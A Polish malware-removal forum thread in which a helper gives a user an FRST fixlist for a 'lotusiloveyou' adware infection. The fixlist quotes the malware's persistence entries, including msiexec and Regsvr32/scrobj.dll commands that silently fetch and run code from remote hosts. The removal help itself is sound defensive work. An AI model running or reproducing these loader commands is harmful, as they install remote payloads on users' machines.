Avast powiadamia o URL:Mal lotusiloveyou

lukrpz · 25 Kwietnia 2017

Witam. Ze względu na to, że mam taki sam problem jak kolega Pibosz https://www.fixitpc.pl/topic/32446-jak-usun%C4%85%C4%87-urlmal-lotusiloveyou/ postanowiłem skopiować jego temat:

"Od kilku dni mam problem - avast ciągle wyświetla monity o malware "llotusiloveyou". Z monitu wynika, że jest on związany z procesem Regserv32. Skanowanie nic nie daje, nie usuwa niczego. Zgodnie z informacją na forum przeskanowałem komputer za pomocą FRST i GMER-a, jednak w przypadku tego drugiego nie mogłem zaznaczyć wszystkich elementów do skanowania (jedynie usługi, rejestr i pliki). Na forum avasta znalazłem taką informację z fixlistą dla FRST (https://goo.gl/swsNgs), niestety z tego co widzę każda fixlista musi być dopasowana indywidualnie. W załączniku dodaję raporty ze skanów."

Będę wdzięczny za równie skuteczną pomoc.

Miszel03 · 26 Kwietnia 2017

No cóż...jest infekcja faktycznie identyczna jak w tamtym temacie, ale na przyszłość: nie podoba mi się kopiowanie opisów tematów. To niszczy strukturę forum, każdy przypadek jest indywidualny i wole mieć opis również indywidualny.

1. Spróbuj uruchomić ten plik deinstalacyjny adware: C:\Users\Stacle\AppData\Roaming\webssearches\UninstallManager.exe.

2. Otwórz Notatnik w nim wklej:

CloseProcesses:
CreateRestorePoint:
HKU\S-1-5-21-531191069-2322497366-2288422930-1000\...\Policies\system: [shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkPGN8OTUcMWMyNDQdGdZ2ZTJfnGZ8nAh4nWZ2ZTJfnGZ8 /q
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-531191069-2322497366-2288422930-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
StartMenuInternet: IEXPLORE.EXE - iexplore.exe
S3 IntcAzAudAddService; system32\drivers\RTKVHD64.sys [X]
U3 tmlwf; Brak ImagePath
U3 tmwfp; Brak ImagePath
U3 ffrdipoc; \??\C:\Users\Stacle\AppData\Local\Temp\ffrdipoc.sys [X] 
Task: {020A73A9-C13C-452A-8BCB-B4CBEEBEFA6E} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkPGN8OTUcMWMyNDQdGdZ2ZTJfnGZ8nAh4nWZ2ZTJfnGZ8 scrobj.dll
Task: {151927A4-4E65-4502-AE5F-F7A382ADB41B} - System32\Tasks\{0C959900-9599-4038-AF97-C4598B646275} => pcalua.exe -a C:\Users\Stacle\AppData\Roaming\webssearches\UninstallManager.exe -c -ptid=w3i 
C:\Users\Stacle\AppData\Roaming\webssearches
EmptyTemp:

Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach.

Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt.

3. Pobierz AdwCleaner uruchom go i kliknij Skanuj, a gdy uaktywni się przycisk Oczyść kliknij go. Dostarcz raport z tego działania.

4. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

lukrpz · 26 Kwietnia 2017

Posłużyłem się cudzym opisem ponieważ mój przypadek był identyczny zarówno jeśli chodzi o objawy jak i o to, że GMER także nie pozwolił na zaznaczenie wszystkich opcji. Mam nadzieję, że kolega Pibosz się nie obraził.

Próbowałem uruchomić plik C:\Users\Stacle\AppData\Roaming\webssearches\UninstallManager.exe ale bez powodzenia. Czy może być to spowodowane tym, że jeszcze wczoraj, jakiś czas po przesłaniu raportów ze skanów, uruchomiłem Malwarebytes Anti - Malware? Usunął jakąś grupę podejrzanych struktur. Mam jeszcze raz wykonać raporty? Dodam, że kolejnych punktów nie wykonywałem. Jak widać jestem dosyć tępy w temacie więc proszę o cierpliwość. Jeszcze raz, z góry dziękuję za pomoc.

Miszel03 · 26 Kwietnia 2017

Ludzie...napisałem instrukcję pod całkowicie nieaktualny obraz systemu. W instrukcjach wyraźnie piszemy, że po generacji raportów na komputerze już nic inwazyjnego nie robimy.

Zrób nowe raport FRST oraz GMER, dostarcz też raport z MBAM.

lukrpz · 26 Kwietnia 2017

Przepraszam za kłopot ale wczoraj z kompem działo się coś dziwnego - znikąd pojawił się google chrome a firefox przestał działać. No i ogólnie wolno chodził. Zresetowałem go i przeskanowałem MBAM-em. Jeszcze raz przepraszam. Przesyłam jeszcze raz wszystkie raporty i proszę o dalsze wskazówki.